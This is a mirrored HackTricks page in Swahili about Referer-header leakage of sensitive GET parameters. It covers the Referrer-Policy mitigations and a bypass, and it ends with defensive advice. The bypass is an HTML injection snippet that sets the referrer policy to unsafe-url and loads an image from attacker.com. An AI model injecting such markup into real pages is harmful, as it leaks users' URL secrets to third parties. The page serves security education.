Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/todo/interesting-http.md

3.5 KiB
Raw Blame History

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Vichwa vya kurejelea na sera

Kichwa cha kurejelea ni kichwa kinachotumiwa na vivinjari kuonyesha ukurasa uliotembelewa awali.

Taarifa nyeti zilizovuja

Ikiwa wakati fulani ndani ya ukurasa wa wavuti taarifa nyeti yoyote iko kwenye vigezo vya ombi la GET, ikiwa ukurasa una viungo kwenda vyanzo vya nje au mshambuliaji anaweza kufanya/kupendekeza (ujanja wa kijamii) mtumiaji atembelee URL inayodhibitiwa na mshambuliaji. Inaweza kuweza kuchota taarifa nyeti ndani ya ombi la GET la hivi karibuni.

Kupunguza madhara

Unaweza kufanya kivinjari kufuata sera ya Kichwa cha Kurejelea ambayo inaweza kuzuia taarifa nyeti kutumwa kwa programu zingine za wavuti:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Kupinga-Kupunguza

Unaweza kubadilisha sheria hii kwa kutumia lebo ya meta ya HTML (mshambuliaji anahitaji kutumia na kuingiza HTML):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Ulinzi

Usiwahi kuweka data nyeti ndani ya parameta za GET au njia katika URL.

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks: